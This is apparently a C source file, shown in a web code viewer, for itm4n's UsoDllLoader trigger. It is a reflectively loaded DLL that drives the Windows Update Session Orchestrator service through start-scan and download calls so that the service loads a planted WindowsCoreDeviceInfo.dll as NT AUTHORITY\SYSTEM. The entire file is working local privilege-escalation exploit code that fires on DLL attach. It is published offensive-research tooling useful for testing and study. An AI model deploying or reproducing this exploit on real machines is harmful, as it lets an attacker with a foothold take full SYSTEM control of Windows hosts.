Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
/* 
2
 * Update Session Orchestrator service DLL load trigger
3
 * 
4
 * Author:
5
 *   itm4n
6
 * References:
7
 *   - https://github.com/itm4n/UsoDllLoader
8
 *   - https://itm4n.github.io/usodllloader-part1/
9
 *   - https://itm4n.github.io/usodllloader-part2/
10
 *
11
 * Load this DLL to trigger the Update Session Orchestrator service to load the
12
 * DLL at C:\Windows\System32\WindowsCoreDeviceInfo.dll as NT_AUTHORITY\SYSTEM.
13
 * The "Windows Update" service must be running for this technique to work.
14
 */
15

16
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
17
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
18
#include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
19
#include "MiniUsoClient.h"
20

21
#include <stdio.h>
22
#include <stdint.h>
23
#include <stdlib.h>
24
#include <windows.h>
25

26
BOOL trigger(void) {
27
	MiniUsoClient miniUsoClient;
28
	DWORD dwDelay = 2000;
29

30
	if (!miniUsoClient.Run(USO_STARTSCAN)) {
31
		return FALSE;
32
	}
33
	Sleep(dwDelay);
34

35
	if (!miniUsoClient.Run(USO_STARTINTERACTIVESCAN)) {
36
		return FALSE;
37
	}
38
	Sleep(dwDelay);
39

40
	if (!miniUsoClient.Run(USO_STARTDOWNLOAD)) {
41
		return FALSE;
42
	}
43

44
	return TRUE;
45
};
46

47
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
48
{
49
	BOOL bReturnValue = TRUE;
50
	switch (dwReason)
51
	{
52
	case DLL_QUERY_HMODULE:
53
		hAppInstance = hinstDLL;
54
		if (lpReserved != NULL)
55
		{
56
			*(HMODULE*)lpReserved = hAppInstance;
57
		}
58
		break;
59
	case DLL_PROCESS_ATTACH:
60
		hAppInstance = hinstDLL;
61
		trigger();
62
		break;
63
	case DLL_PROCESS_DETACH:
64
	case DLL_THREAD_ATTACH:
65
	case DLL_THREAD_DETACH:
66
		break;
67
	}
68
	return bReturnValue;
69
}
70

71